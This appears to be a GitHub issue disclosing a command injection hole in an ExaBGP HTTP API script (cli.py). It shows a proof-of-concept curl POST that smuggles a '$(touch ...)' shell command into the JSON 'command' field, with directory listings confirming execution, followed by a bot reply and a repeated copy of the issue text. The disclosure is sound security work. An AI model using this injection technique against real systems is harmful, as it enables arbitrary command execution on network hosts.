Open networkhorse opened 3 years ago
Hi there,
Your cli.py is vulnerable to command injection as displayed below:
The original state:
/exabgp # ls Dockerfile cli.py entrypoint.sh exabgp.conf requirements.txt
The injection:
curl -X POST -H 'Content-Type: application/json' --data "{\"neighbor\": \"blah\", \"command\": \"';"'$(touch /exabgp/test.txtbroken)'"'\"}" http://127.0.0.1:5001/exabgp/cli/announce/flowspec { "error": false, "stdout": "b'command: neighbor blah\\n'" }
And finally:
/exabgp # ls Dockerfile cli.py entrypoint.sh exabgp.conf requirements.txt test.txtbroken
Perhaps considering sanitising input.
Thanks!
edit: I mean thank you for submitting an issue.
Please be aware that during these covid times, response times may be slow. Please allow 24-48 hours for any issues to be reviewed and/or resolved.
Hi there,
Your cli.py is vulnerable to command injection as displayed below:
The original state:
The injection:
And finally:
Perhaps considering sanitising input.
Thanks!